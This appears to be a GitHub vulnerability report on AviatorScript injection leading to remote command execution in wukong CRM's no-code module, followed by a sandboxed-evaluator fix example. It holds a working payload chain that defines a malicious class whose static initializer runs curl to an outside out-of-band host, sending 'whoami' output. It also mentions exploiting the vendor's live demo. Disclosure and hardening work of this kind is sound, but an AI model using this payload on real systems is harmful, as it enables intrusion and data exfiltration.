
wukong nocoding module AviatorScript Inject RCE (AviatorScript backend command execution) #4

Open
AfterSnows opened this issue Jul 1, 2024 · 0 comments

Affected versions

<=latest

In ExpressionUtil.java, AviatorEvaluator is used to execute expressions directly without any configured security policy (no feature restrictions and no class whitelist), leading to an AviatorScript injection vulnerability: by default a script may `use` any Java class and call arbitrary static methods on it.

Vulnerability description

For example, running the following AviatorScript script causes a curl command to be executed. It uses classes already on the classpath (Spring's ClassUtils, Base64Utils and the repackaged cglib ReflectUtils) to decode a base64-encoded class file and define it in the application class loader; the class's static initializer then runs the command. The base64 blob is omitted here:

```
use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('...');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);
```

Payload generation:

```java
// Class whose static initializer runs as soon as the class is defined/initialized.
// ReflectUtils.defineClass() in the script above loads this class into the target JVM,
// so the command runs without any further interaction.
public class a {
    static {
        try {
            // Out-of-band check: the DNS/HTTP request carries the output of `whoami`.
            Runtime.getRuntime().exec("curl http://ip.port.e78jto.ceye.io/`whoami`");
        } catch (Exception e) {
            // Swallow errors so the failed load does not surface in the application.
        }
    }
}
```

Compile this Java class `a` to a .class file, base64-encode the class bytes, and substitute the result for `{{evilpayload}}` in the script below:

```
use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('{{evilpayload}}');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);
```

Reproduction steps

Command execution via this vulnerability also works against the official demo environment: https://www.72crm.com/

Because AviatorEvaluator expressions are used in many places, AviatorScript injection can be triggered from many entry points.

First, add a module in the no-code module.

[screenshot]

Configure the fields normally, and set the calculation formula to the AviatorEvaluator command-execution payload.

Here I set the phone number as the main module; after adding it, the expression is evaluated and triggers the payload. I chose the curl out-of-band command execution.

[screenshot]

After publishing, enter this module and add a phone number to trigger it.

[screenshot]

Demonstration of the command execution result

[screenshot]

Fix recommendation

apache/hertzbeat@8dcf050
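To make the description above concrete, here is an added example (mine, not code from wukong crm or from the referenced hertzbeat commit) that puts a user-supplied formula through the default global AviatorEvaluator, as ExpressionUtil.java does, and then through a dedicated AviatorEvaluatorInstance with a restricted feature set and an empty class whitelist. It assumes AviatorScript 5.x (com.googlecode.aviator) on the classpath; the class name FormulaSandboxDemo, the method names and the sample formulas are my own. The probe formula only reads a system property rather than running a command, which is enough to show whether `use` of an arbitrary class is reachable.

```java
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

public class FormulaSandboxDemo {

    // Hardened evaluator for tenant-supplied formulas (assumed configuration,
    // not the project's own). A separate instance keeps these settings from
    // affecting any other AviatorEvaluator user in the JVM.
    private static final AviatorEvaluatorInstance SAFE = AviatorEvaluator.newInstance();

    static {
        // Only the language features a calculated field legitimately needs:
        // no Module (use/require), no NewInstance (new), no lambdas/fn.
        SAFE.setOption(Options.FEATURE_SET, Feature.asSet(
                Feature.Assignment, Feature.Let, Feature.If,
                Feature.Return, Feature.StringInterpolation));
        // Empty whitelist: no Java class may be referenced via `use` or `new`.
        // (A null value, the default, means "every class is allowed".)
        SAFE.setOption(Options.ALLOWED_CLASS_SET, Collections.emptySet());
        SAFE.setOption(Options.ASSIGNABLE_ALLOWED_CLASS_SET, Collections.emptySet());
        // Prevent a.b.c property walks from reaching into arbitrary objects.
        SAFE.setOption(Options.ENABLE_PROPERTY_SYNTAX_SUGAR, false);
        // Bound loops so a formula cannot be used for CPU exhaustion.
        SAFE.setOption(Options.MAX_LOOP_COUNT, 1000);
    }

    // Mirrors the vulnerable pattern: global default instance, no policy.
    static Object evalVulnerable(String formula, Map<String, Object> env) {
        return AviatorEvaluator.execute(formula, env);
    }

    // Hardened path: same formula, restricted instance.
    static Object evalSandboxed(String formula, Map<String, Object> env) {
        return SAFE.execute(formula, env);
    }

    public static void main(String[] args) {
        // Constructed sample record standing in for a no-code module row.
        Map<String, Object> env = new HashMap<>();
        env.put("price", 10);
        env.put("qty", 3);

        // A legitimate calculated-field formula works on both evaluators.
        System.out.println("sandboxed price*qty = " + evalSandboxed("price * qty", env));

        // Attacker-controlled formula: same `use` primitive as the report's
        // payload, but harmless (reads a property instead of running curl).
        String probe = "use java.lang.System; System.getProperty('java.version');";

        // Default instance: the static call goes through.
        System.out.println("vulnerable probe   = " + evalVulnerable(probe, env));

        // Restricted instance: `use` is rejected at compile time, so the
        // formula never gets to call into java.lang.System.
        try {
            evalSandboxed(probe, env);
            System.out.println("sandboxed probe    = NOT BLOCKED (misconfiguration)");
        } catch (Exception e) {
            System.out.println("sandboxed probe    = rejected (" + e.getClass().getSimpleName() + ")");
        }
    }
}
```

The class whitelist and the feature set are independent controls; keeping both means that even if a later Aviator version relaxes one of them, a formula still cannot reach `org.springframework.cglib.core.ReflectUtils` or any other class on the classpath. Apply the same restricted instance at every call site that evaluates a user-supplied expression, since the report notes that AviatorEvaluator is used in many places.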
